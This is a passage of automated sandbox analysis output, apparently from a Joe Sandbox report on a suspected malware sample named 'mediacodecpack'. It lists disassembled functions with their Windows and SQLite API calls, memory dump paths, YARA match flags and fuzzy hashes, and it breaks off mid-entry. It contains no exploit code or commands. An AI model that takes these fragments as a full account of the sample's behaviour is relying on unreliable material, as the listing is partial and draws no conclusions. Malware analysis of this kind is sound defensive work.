                                                                                            • Opcode ID: 697de28deffca7a8713946bf57d344b2cffb3497efeb3799f2ec22fb237049b3
                                                                                            • Instruction ID: 13d0081663d5c949863e01e780637134611a7a95a1637e4bbe86339b43f74999
                                                                                            • Opcode Fuzzy Hash: 697de28deffca7a8713946bf57d344b2cffb3497efeb3799f2ec22fb237049b3
                                                                                            • Instruction Fuzzy Hash: E1900220604101AFD2000B225F4861536A45505B4171A483D5447E0064DA3980496519
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 2697fc5bc034a1ffb4056f3d6960c569a4768683e8bbd70c4bae01e5f682b149
                                                                                            • Instruction ID: 578dd1ffac1f8e1011a1a5834bce6420265c4f34c8c97087b967ba0ca0ba6dfb
                                                                                            • Opcode Fuzzy Hash: 2697fc5bc034a1ffb4056f3d6960c569a4768683e8bbd70c4bae01e5f682b149
                                                                                            • Instruction Fuzzy Hash: 20900220604101DAE2040A725A082192654660464571149395447E0150DA3580095D29
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d78000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 07e53c3450cac83a113342dffad536af3164f176ac51da337a449141736007db
                                                                                            • Instruction ID: fb34502318cd13104485cb6b3f5ae2c68762d28f03041164bef77071430deb83
                                                                                            • Opcode Fuzzy Hash: 07e53c3450cac83a113342dffad536af3164f176ac51da337a449141736007db
                                                                                            • Instruction Fuzzy Hash: 8F519EF2608600AFE7097E19DC9577EF7E9EF88724F16092EE6C583340E63558408A97
                                                                                            APIs
                                                                                              • Part of subcall function 02D50620: OpenEventA.KERNEL32(00100002,00000000,00000000,96605425), ref: 02D506C0
                                                                                              • Part of subcall function 02D50620: CloseHandle.KERNEL32(00000000), ref: 02D506D5
                                                                                              • Part of subcall function 02D50620: ResetEvent.KERNEL32(00000000,96605425), ref: 02D506DF
                                                                                              • Part of subcall function 02D50620: CloseHandle.KERNEL32(00000000,96605425), ref: 02D50714
                                                                                            • TlsSetValue.KERNEL32(0000002B,?), ref: 02D511BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                                            • String ID:
                                                                                            • API String ID: 1556185888-0
                                                                                            • Opcode ID: 11d7ff57b7e5cf2226be3be35ac2ef6aa5163b4df39a6d1b196b596761425e08
                                                                                            • Instruction ID: acfeb63896b9354fa0287417feb9b188f9ea45d7c58298db3828f2ebbebb849e
                                                                                            • Opcode Fuzzy Hash: 11d7ff57b7e5cf2226be3be35ac2ef6aa5163b4df39a6d1b196b596761425e08
                                                                                            • Instruction Fuzzy Hash: D601A271A44254AFD710CF58EC09F5ABBE8FB09771F10476AF829D3380D775AD048AA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSleepStartup
                                                                                            • String ID:
                                                                                            • API String ID: 3346105675-0
                                                                                            • Opcode ID: 820f2d36c53b95829267cfd4d46e36cd9cb5e965e78971ddadb887229b3ef415
                                                                                            • Instruction ID: 9a29c4e619f7a4d8ed8324ebca556abd9c53da00443e6c512cbb7d8c9fa3b2b6
                                                                                            • Opcode Fuzzy Hash: 820f2d36c53b95829267cfd4d46e36cd9cb5e965e78971ddadb887229b3ef415
                                                                                            • Instruction Fuzzy Hash: 8FE08670C06245C6D724CEDC97243AAB3306748306F680137D107762D9C23D8D4EDA1F
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000), ref: 0040184D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 91fd1d15897780a22772685a9e9e11523d47d63b978241df2ce472f9aad5acef
                                                                                            • Instruction ID: 3b235d091506e9fd49973954eb1e1228e6c7b9fea26647d7565d0fb406e94443
                                                                                            • Opcode Fuzzy Hash: 91fd1d15897780a22772685a9e9e11523d47d63b978241df2ce472f9aad5acef
                                                                                            • Instruction Fuzzy Hash: 16D01271849504DFDF084FF4CA48ADDBF30BB10701F110466E906BA1A1CB7CD947AB05
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040D1CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 8eeb56a042a3dc7536f4384a1371a3b7fda40716cbfa0a1f94c25bc104d3c431
                                                                                            • Instruction ID: fcb18d1d78468dbf9f57a7137ce4b137392d6aea0d2686bddcdc2e81c808b1ca
                                                                                            • Opcode Fuzzy Hash: 8eeb56a042a3dc7536f4384a1371a3b7fda40716cbfa0a1f94c25bc104d3c431
                                                                                            • Instruction Fuzzy Hash: 20B09234955B409BE28267A08AC96BC7760AB54300F601522AA12A91C08E785A47A50B
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                              • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                            • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                            • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                            • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                            • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                            • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                            • memcmp.MSVCRT ref: 60967D4C
                                                                                            • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                            • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                            • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                            • sqlite3_free.SQLITE3 ref: 60968002
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                              • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                              • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                            • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                            • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                            • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                            • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                            • sqlite3_step.SQLITE3 ref: 60968139
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                              • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                            • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                              • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                              • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                              • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                            • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                            • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                              • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                            • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                            • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                            • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                            • sqlite3_free.SQLITE3 ref: 60969102
                                                                                            • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID: $d
                                                                                            • API String ID: 2451604321-2084297493
                                                                                            • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                            • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                            • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                            • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                            APIs
                                                                                            • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                            • sqlite3_free.SQLITE3 ref: 60966183
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                            • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                            • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                            • memcmp.MSVCRT ref: 6096639E
                                                                                              • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                              • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                              • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                              • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                            • String ID: ASC$DESC$x
                                                                                            • API String ID: 4082667235-1162196452
                                                                                            • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                            • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                            • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                            • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                            • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                            • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                              • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                              • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                              • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                              • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                            • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                            • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                            • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                            • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                            • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                            • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                            • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                            • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                              • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                            • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                            • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                            • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                            • String ID:
                                                                                            • API String ID: 961572588-0
                                                                                            • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                            • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                            • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                            • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                            • String ID: 2$foreign key$indexed
                                                                                            • API String ID: 4126863092-702264400
                                                                                            • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                            • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                            • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                            • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp
                                                                                            • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                            • API String ID: 912767213-1308749736
                                                                                            • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                            • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                            • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                            • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                              • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                            • String ID:
                                                                                            • API String ID: 4082478743-0
                                                                                            • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                            • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                            • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                            • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                            APIs
                                                                                              • Part of subcall function 02D48ADD: __EH_prolog.LIBCMT ref: 02D48AE2
                                                                                              • Part of subcall function 02D48ADD: _Allocate.LIBCPMT ref: 02D48B39
                                                                                              • Part of subcall function 02D48ADD: _memmove.LIBCMT ref: 02D48B90
                                                                                            • _memset.LIBCMT ref: 02D4F949
                                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D4F9B2
                                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D4F9BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                            • String ID: Unknown error$invalid string position
                                                                                            • API String ID: 1854462395-1837348584
                                                                                            • Opcode ID: 587c5c482a29036748163f89e31f7ec7f0babdf49d19e27d85c3772475a44c7b
                                                                                            • Instruction ID: a3dd02e959af017ca33b2a9ffb07d5ab0daf6f4cd7404f68823352bd185ddf05
                                                                                            • Opcode Fuzzy Hash: 587c5c482a29036748163f89e31f7ec7f0babdf49d19e27d85c3772475a44c7b
                                                                                            • Instruction Fuzzy Hash: 8351AF706083419FE714CF24C891B2EBBE4EB98744F50492EF492977A1DB71D988CB52
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                            • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
